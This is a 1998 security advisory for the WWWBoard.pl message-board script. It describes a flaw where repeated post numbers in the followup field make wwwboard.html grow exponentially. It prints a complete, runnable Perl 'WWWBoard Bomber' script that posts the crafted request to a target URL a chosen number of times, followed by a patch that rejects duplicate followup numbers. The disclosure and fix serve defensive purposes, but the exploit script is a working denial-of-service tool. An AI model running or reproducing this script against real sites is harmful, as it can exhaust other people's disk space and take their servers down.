COMMAND

    WWWBoard

SYSTEMS AFFECTED

    Systems running WWWBoard.pl

PROBLEM

    Samuel Sparling  found following.   When the  followup value  in a
    form posted to the WWWBoard  script contains the same post  number
    twice, the script follows up to that post twice, even printing the
    number of  followups to  a particular  post (on  the wwwboard.html
    file) multiple times. This exploit does even one better than  just
    'messing up' the board, if  done severly enough, it can  cause the
    wwwboard.html file to  become hundreds of  megabytes in size.   It
    appears that the  number of followups  shown on the  main page (if
    there's three, it'd look like "(3)") increases exponentially  with
    this flaw,  such that  posting a  followup value  of say "5,5,5" 2
    times would make  (2) appear as  the followup value,  but it would
    appear 9 times. From the best I can tell, the number of  followups
    you have that are the same (like "3,3,3,3,3" would have 5) is  the
    number  of   times  the   followup  value   will  appear   on  the
    wwwboard.html page, and if you  post the same twice, it  does that
    number to the  second power, and  thrice does to  the third power,
    etc.  (whereas if you post "3,3,3,3,3" once, it'll have 5 followup
    numbers, if you post it twice, it'll have 25, if you post it three
    times, it'll have 125, post it ten times and it'll show  9,765,625
    times,  twelve  times  244,140,625,  thirteen times 1,220,703,125,
    etc.)  And even though it appears that only three bytes "(X)"  are
    added for each followup value  you see, there are comments  in the
    HTML  making  it  appear  as  "(<!--responses: 3-->5)" in the html
    source if there's 5 followups to message 3.

    As that shows, this can cause much more damage than just a  simple
    annoyance. This flaw could easilly be exploited to the point where
    a users quota  is maxed out,  or even to  the point where  the web
    server runs out of disk space.  Below is an exploit script, and  a
    patch to  fix the  wwwboard.pl script.   Here is  an example  perl
    script to exploit this flaw:

    #!/usr/bin/perl
    ###################################################
    #
    # WWWBoard Bomber Exploit Script
    # Written By: Samuel Sparling (sparling@slip.net)
    #
    # Written to exploit a flaw in the WWWBoard script
    # by Matt Wright.
    #
    # Copyright © 1998 Samuel Sparling
    # All Rights Reserved.
    #
    # Written 11-04-1998
    ###################################################
    use Socket;# Tell perl to use the socket module

    # Change this if the server you're trying on uses a different port for http
    $port=80;

    print "WWWBoard Bomber Exploit Script\n\n";
    print "WWWBoard.pl URL: ";
    $url=<STDIN>;
    chop($url) if $url =~ /\n$/;

    print "Name: ";
    $name=<STDIN>;
    chop($name) if $name =~ /\n$/;

    print "E-Mail: ";
    $email=<STDIN>;
    chop($email) if $email =~ /\n$/;

    print "Subject: ";
    $subject=<STDIN>;
    chop($subject) if $subject =~ /\n$/;

    print "Message: ";
    $message=<STDIN>;
    chop($message) if $message =~ /\n$/;

    print "Followup Value: ";
    $followup=<STDIN>;
    chop($followup) if $followup =~ /\n$/;

    print "Times to Post: ";
    $stop=<STDIN>;
    chop($stop) if $stop =~ /\n$/;



            # Chop the URL into peices to use for the actual posting
            $remote = $url;

            $remote =~ s/http\:\/\///g;
            $remote =~ s/\/([^>]|\n)*//g;

            $path = $url;
            $path =~ s/http\:\/\///g;
            $path =~ s/$remote//g;


            $forminfo =
    "name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
            $forminfo =~ s/\,/\%2C/g;# Turn comas into %2C so that they can be posted.
            $forminfo =~ tr/ /+/;

            $length = length($forminfo);

            $submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent:
    Mozilla/4.01 (Win95; I)\r\nContent-type:
    application/x-www-form-urlencoded\r\nContent-length:
    $length\r\n\r\n$forminfo\r\n";

            $i=0;
            while($i < $stop)
            {
                    &post_message;
                    $i++;
                    print "$i message(s) posted.\n";
            }


    sub post_message
    {
                    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
                    die("No port specified.") unless $port;
                    $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
                    $paddr = sockaddr_in($port, $iaddr);
                    $proto = getprotobyname('tcp');
                    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:
    $!");
                    connect(SOCK, $paddr) || die("Unable to connect: $!");
                    send(SOCK,$submit,0);
                    while(<SOCK>) {
                            #print $_;# Uncomment for debugging if you have problems.
                    }
                    close(SOCK);
    }


    exit;

SOLUTION

    Below is the  patch, all it  does is check  to make sure  that the
    same followup number is not  used more than once in  the followups
    form field.  In the get_variables subroutine replace this:

       if ($FORM{'followup'}) {
          $followup = "1";
          @followup_num = split(/,/,$FORM{'followup'});
          $num_followups = @followups = @followup_num;
          $last_message = pop(@followups);
          $origdate = "$FORM{'origdate'}";
          $origname = "$FORM{'origname'}";
          $origsubject = "$FORM{'origsubject'}";
       }

    with this:

       if ($FORM{'followup'}) {
          $followup = "1";
          @followup_num = split(/,/,$FORM{'followup'});
          $num_followups = @followups = @followup_num;
          $last_message = pop(@followups);
          $origdate = "$FORM{'origdate'}";
          $origname = "$FORM{'origname'}";
          $origsubject = "$FORM{'origsubject'}";

    # WWWBoard Bomb Patch
    # Written By: Samuel Sparling (sparling@slip.net)
            $fn=0;
            while($fn < $num_followups)
            {
                    $cur_fup = @followups[$fn];
                    $dfn=0;
                    foreach $fm(@followups)
                    {
                            if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
                            {
                                    &error(board_bomb);
                            }
                            $dfn++;
                    }
            $fn++;
            }
    # End WWWBoard Bomb Patch
       }